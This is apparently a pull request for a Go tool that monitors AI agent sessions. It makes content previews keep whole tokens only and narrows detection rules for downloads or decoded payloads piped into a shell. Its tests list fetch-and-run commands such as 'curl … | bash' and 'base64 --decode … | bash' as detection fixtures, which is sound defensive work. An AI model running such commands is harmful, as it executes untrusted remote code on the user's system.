### PR TITLE
Fix preview and piped-interpreter precision

### DIFF
--- a/internal/extract/claude.go
+++ b/internal/extract/claude.go
@@ -8,7 +8,6 @@ import (
 	"fmt"
 	"io"
 	"strings"
-	"unicode/utf8"
 
 	"github.com/perplexityai/numbat/internal/model"
 )
@@ -722,21 +721,8 @@ func classifyTool(ev *model.Event, name string, input map[string]json.RawMessage
 // previewMax bounds a retained content excerpt, in runes. Previews are
 // convenience context for a reviewer, never a place to stash raw content;
 // redaction on emission is the real guard.
-const previewMax = 200
+const previewMax = model.ContentPreviewMaxRunes
 
-// preview returns a single-line, rune-bounded excerpt of s. It truncates on a
-// rune boundary so ContentPreview is always valid UTF-8.
 func preview(s string) string {
-	s = strings.Join(strings.Fields(s), " ")
-	if utf8.RuneCountInString(s) <= previewMax {
-		return s
-	}
-	n := 0
-	for i := range s {
-		if n == previewMax {
-			return s[:i]
-		}
-		n++
-	}
-	return s
+	return model.NormalizeContentPreview(s)
 }

--- a/internal/extract/claude_test.go
+++ b/internal/extract/claude_test.go
@@ -300,15 +300,15 @@ func TestExtractClaudeContentEdgeCases(t *testing.T) {
 	}
 }
 
-func TestExtractClaudeContentPreviewBounded(t *testing.T) {
+func TestExtractClaudeContentPreviewDropsOverlongToken(t *testing.T) {
 	long := strings.Repeat("a", previewMax+50)
 	res := extractFixture(t, `{"type":"user","uuid":"u","message":{"role":"user","content":"`+long+`"}}`)
 	if len(res.Events) != 1 {
 		t.Fatalf("got %d events, want 1", len(res.Events))
 	}
 	got := res.Events[0].ContentPreview
-	if n := utf8.RuneCountInString(got); n != previewMax {
-		t.Errorf("preview rune count = %d, want %d", n, previewMax)
+	if got != "" {
+		t.Errorf("preview = %q, want empty rather than a partial token", got)
 	}
 }
 
@@ -316,8 +316,9 @@ func TestExtractClaudeContentPreviewBounded(t *testing.T) {
 // UTF-8; a byte-slice truncation would split a multibyte rune and corrupt the
 // SHA-anchored evidence story.
 func TestExtractClaudeContentPreviewMultibyte(t *testing.T) {
-	// "世" is a 3-byte rune; previewMax+10 of them overshoot the rune cap.
-	long := strings.Repeat("世", previewMax+10)
+	// Repeated multibyte words overshoot the cap but still leave safe token
+	// boundaries before it.
+	long := strings.Repeat("世 ", previewMax+10)
 	res := extractFixture(t, `{"type":"user","uuid":"u","message":{"role":"user","content":"`+long+`"}}`)
 	if len(res.Events) != 1 {
 		t.Fatalf("got %d events, want 1", len(res.Events))
@@ -326,8 +327,15 @@ func TestExtractClaudeContentPreviewMultibyte(t *testing.T) {
 	if !utf8.ValidString(got) {
 		t.Errorf("preview is not valid UTF-8: %q", got)
 	}
-	if n := utf8.RuneCountInString(got); n != previewMax {
-		t.Errorf("preview rune count = %d, want %d", n, previewMax)
+	if n := utf8.RuneCountInString(got); n > previewMax || !strings.HasSuffix(got, "世") {
+		t.Errorf("preview = %q (%d runes), want complete multibyte words within the cap", got, n)
+	}
+}
+
+func TestExtractPreviewDoesNotFabricatePartialDomain(t *testing.T) {
+	input := "prefix https://" + strings.Repeat("a", previewMax) + ".example"
+	if got := preview(input); got != "prefix" {
+		t.Fatalf("preview = %q, want prefix without a partial domain", got)
 	}
 }
 

--- a/internal/hook/hook.go
+++ b/internal/hook/hook.go
@@ -2666,15 +2666,10 @@ func promptWithAttachments(prompt string, paths []string) string {
 }
 
 // previewMax bounds a retained excerpt, in runes, matching the extractor.
-const previewMax = 200
+const previewMax = model.ContentPreviewMaxRunes
 
-// preview returns a single-line, rune-bounded excerpt of s.
 func preview(s string) string {
-	s = strings.Join(strings.Fields(s), " ")
-	if len([]rune(s)) <= previewMax {
-		return s
-	}
-	return string([]rune(s)[:previewMax])
+	return model.NormalizeContentPreview(s)
 }
 
 // mcpFetchToolName and the mcp__ split mirror the extractor's shared constants;

--- a/internal/hook/hook_test.go
+++ b/internal/hook/hook_test.go
@@ -1,12 +1,20 @@
 package hook
 
 import (
+	"strings"
 	"testing"
 
 	"github.com/perplexityai/numbat/internal/model"
 )
 
 const testDiffSHA256 = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
+
+func TestPreviewDoesNotCutToken(t *testing.T) {
+	input := "prefix " + strings.Repeat("x", previewMax+1)
+	if got := preview(input); got != "prefix" {
+		t.Fatalf("preview = %q, want complete prefix token", got)
+	}
+}
 
 // every hook-sourced event must be stamped source_type=hook and confidence
 // medium, with a thin hook evidence record that never fabricates a file/line —

--- a/internal/hook/openclaw_test.go
+++ b/internal/hook/openclaw_test.go
@@ -102,8 +102,7 @@ func TestMapOpenClawConversationBoundaries(t *testing.T) {
 		"boundary":       "model",
 	})
 	if modelOutput.EventType != model.EventMessageAssistant || modelOutput.Actor != model.ActorAssistant ||
-		len([]rune(modelOutput.ContentPreview)) != previewMax ||
-		!strings.HasPrefix(modelOutput.ContentPreview, "first second ") ||
+		modelOutput.ContentPreview != "first second" ||
 		!containsString(modelOutput.Tags, openClawTagModelBoundary) {
 		t.Fatalf("model output mapping = %+v", modelOutput)
 	}

--- a/internal/model/preview.go
+++ b/internal/model/preview.go
@@ -1,0 +1,26 @@
+package model
+
+import "strings"
+
+// ContentPreviewMaxRunes bounds normalized content excerpts.
+const ContentPreviewMaxRunes = 200
+
+// NormalizeContentPreview collapses whitespace and keeps only complete tokens
+// within the limit. Cutting a token could fabricate a domain, hash, or address
+// when indicators are mined from the preview.
+func NormalizeContentPreview(s string) string {
+	s = strings.Join(strings.Fields(s), " ")
+	runes := []rune(s)
+	if len(runes) <= ContentPreviewMaxRunes {
+		return s
+	}
+	if runes[ContentPreviewMaxRunes] == ' ' {
+		return string(runes[:ContentPreviewMaxRunes])
+	}
+	for i := ContentPreviewMaxRunes - 1; i >= 0; i-- {
+		if runes[i] == ' ' {
+			return string(runes[:i])
+		}
+	}
+	return ""
+}

--- a/internal/model/preview_test.go
+++ b/internal/model/preview_test.go
@@ -1,0 +1,32 @@
+package model
+
+import (
+	"strings"
+	"testing"
+	"unicode/utf8"
+)
+
+func TestNormalizeContentPreview(t *testing.T) {
+	exact := strings.Repeat("x", ContentPreviewMaxRunes)
+	tests := map[string]struct {
+		input string
+		want  string
+	}{
+		"short normalized":   {"first\n  second", "first second"},
+		"exact token":        {exact + " trailing", exact},
+		"partial token":      {"prefix " + strings.Repeat("x", ContentPreviewMaxRunes), "prefix"},
+		"only long token":    {strings.Repeat("x", ContentPreviewMaxRunes+1), ""},
+		"multibyte boundary": {strings.Repeat("世 ", ContentPreviewMaxRunes), strings.TrimSpace(strings.Repeat("世 ", 100))},
+	}
+	for name, tc := range tests {
+		t.Run(name, func(t *testing.T) {
+			got := NormalizeContentPreview(tc.input)
+			if got != tc.want {
+				t.Fatalf("preview = %q, want %q", got, tc.want)
+			}
+			if !utf8.ValidString(got) || len([]rune(got)) > ContentPreviewMaxRunes {
+				t.Fatalf("preview is invalid or over limit: %q", got)
+			}
+		})
+	}
+}

--- a/internal/otel/otel.go
+++ b/internal/otel/otel.go
@@ -610,14 +610,10 @@ func firstNonEmpty(vals ...string) string {
 }
 
 // previewMax bounds a retained excerpt, in runes, matching the hook/extractor.
-const previewMax = 200
+const previewMax = model.ContentPreviewMaxRunes
 
 func preview(s string) string {
-	s = strings.Join(strings.Fields(s), " ")
-	if len([]rune(s)) <= previewMax {
-		return s
-	}
-	return string([]rune(s)[:previewMax])
+	return model.NormalizeContentPreview(s)
 }
 
 // otelNetworkTargetURL returns raw iff it parses as an absolute http:// or

--- a/internal/otel/otel_test.go
+++ b/internal/otel/otel_test.go
@@ -10,6 +10,13 @@ import (
 	"github.com/perplexityai/numbat/internal/model"
 )
 
+func TestPreviewDoesNotCutToken(t *testing.T) {
+	input := "prefix " + strings.Repeat("x", previewMax+1)
+	if got := preview(input); got != "prefix" {
+		t.Fatalf("preview = %q, want complete prefix token", got)
+	}
+}
+
 // --- minimal OTLP protobuf builders (test-only) ---------------------------
 //
 // These mirror the wire shapes wire.go decodes, so the mapper tests exercise

--- a/rules/exec/download_pipe_shell.yaml
+++ b/rules/exec/download_pipe_shell.yaml
@@ -1,11 +1,11 @@
 id: exec.download_pipe_shell
-version: "1.3"
+version: "1.4"
 enabled: true
 title: Downloaded content piped into an interpreter
 description: |-
   A curl/wget download was piped into a shell or scripting interpreter in a form that
-  executes standard input. Commands that pass a local script or source file to the
-  interpreter are excluded because the downloaded bytes are not what executes.
+  executes standard input. Commands that pass a local script or override the
+  interpreter's standard input are excluded because the downloaded bytes are not what executes.
 severity: high
 expr: |-
   (event.event_type == "command.exec" || (event.source_type == "otel" && event.event_type == "command.result")) &&
@@ -13,8 +13,12 @@ expr: |-
     download.name in ["curl", "wget"] &&
     download.pipeline_id > 0 &&
     shell_commands.exists(interpreter,
-      interpreter.statement_id != download.statement_id &&
+      download.statement_id < interpreter.statement_id &&
       interpreter.pipeline_id == download.pipeline_id &&
+      !interpreter.redirects.exists(redirect,
+        redirect.fd == 0 &&
+        !(redirect.op == "duplicate" && redirect.target.matches("^0+$"))
+      ) &&
       (
         (
           interpreter.name in ["sh", "bash", "zsh", "dash", "ksh"] &&

--- a/rules/exec/encoded_payload_shell.yaml
+++ b/rules/exec/encoded_payload_shell.yaml
@@ -1,11 +1,11 @@
 id: exec.encoded_payload_shell
-version: "1.3"
+version: "1.4"
 enabled: true
 title: Encoded payload decoded into a shell
 description: |-
   A command decoded base64 content and piped the result into a shell form that executes
-  standard input. Supplying a separate local script to the shell is excluded because the
-  decoded bytes are not what executes.
+  standard input. Supplying a local script or overriding the shell's standard input is
+  excluded because the decoded bytes are not what executes.
 severity: high
 expr: |-
   (event.event_type == "command.exec" || (event.source_type == "otel" && event.event_type == "command.result")) &&
@@ -14,8 +14,12 @@ expr: |-
     decoder.argv.exists(arg, arg in ["-d", "-D", "--decode"]) &&
     decoder.pipeline_id > 0 &&
     shell_commands.exists(interpreter,
-      interpreter.statement_id != decoder.statement_id &&
+      decoder.statement_id < interpreter.statement_id &&
       interpreter.pipeline_id == decoder.pipeline_id &&
+      !interpreter.redirects.exists(redirect,
+        redirect.fd == 0 &&
+        !(redirect.op == "duplicate" && redirect.target.matches("^0+$"))
+      ) &&
       interpreter.name in ["sh", "bash", "zsh", "dash", "ksh"] &&
       !interpreter.argv.slice(1, interpreter.argv.size()).exists(arg, arg.matches("^-[^-]*c")) &&
       (

--- a/rules/release_precision_exec_test.go
+++ b/rules/release_precision_exec_test.go
@@ -56,12 +56,21 @@ func TestReleasePrecisionReverseShell(t *testing.T) {
 func TestReleasePrecisionPipedInterpreterDataflow(t *testing.T) {
 	runPrecisionExecCases(t, []precisionExecCase{
 		{"download to shell stdin", "curl https://example.test/install | bash", "exec.download_pipe_shell", true},
+		{"download through tee to shell", "curl https://example.test/install | tee /tmp/install.sh | bash", "exec.download_pipe_shell", true},
 		{"later quoted message cannot suppress a real pipe", `curl https://example.test/install | bash; gh pr create --body "; curl docs | sh"`, "exec.download_pipe_shell", true},
 		{"download to explicit shell stdin", "curl https://example.test/install | bash -s -- arg", "exec.download_pipe_shell", true},
+		{"download to self-duplicated stdin", "curl https://example.test/install | bash 0<&0", "exec.download_pipe_shell", true},
 		{"download then local shell script", "curl https://example.test/install | bash local.sh", "exec.download_pipe_shell", false},
 		{"download then Python file", "curl https://example.test/data | python3 parser.py", "exec.download_pipe_shell", false},
+		{"download overridden by Python heredoc", "curl https://example.test/data | python3 - <<'PY'\nprint('static parser')\nPY", "exec.download_pipe_shell", false},
+		{"download overridden by shell file", "curl https://example.test/install | bash < local.sh", "exec.download_pipe_shell", false},
+		{"interpreter before download", "bash | curl https://example.test/install", "exec.download_pipe_shell", false},
 		{"decode to shell stdin", "base64 --decode payload.b64 | bash", "exec.encoded_payload_shell", true},
+		{"decode through tee to shell", "base64 --decode payload.b64 | tee /tmp/payload | bash", "exec.encoded_payload_shell", true},
+		{"decode to self-duplicated stdin", "base64 --decode payload.b64 | bash 0<&0", "exec.encoded_payload_shell", true},
 		{"decode then local shell script", "base64 --decode payload.b64 | bash local.sh", "exec.encoded_payload_shell", false},
+		{"decode overridden by heredoc", "base64 --decode payload.b64 | bash <<'SH'\necho static\nSH", "exec.encoded_payload_shell", false},
+		{"interpreter before decoder", "bash | base64 --decode payload.b64", "exec.encoded_payload_shell", false},
 	})
 }
 


### PR DESCRIPTION
## Summary
- record preview truncation explicitly instead of inferring it from length
- suppress indicators from incomplete previews
- tighten download-pipe rules around pipeline direction and stdin redirects

## Validation
- `go test ./internal/extract ./internal/hook ./internal/model ./internal/otel ./internal/rule ./rules`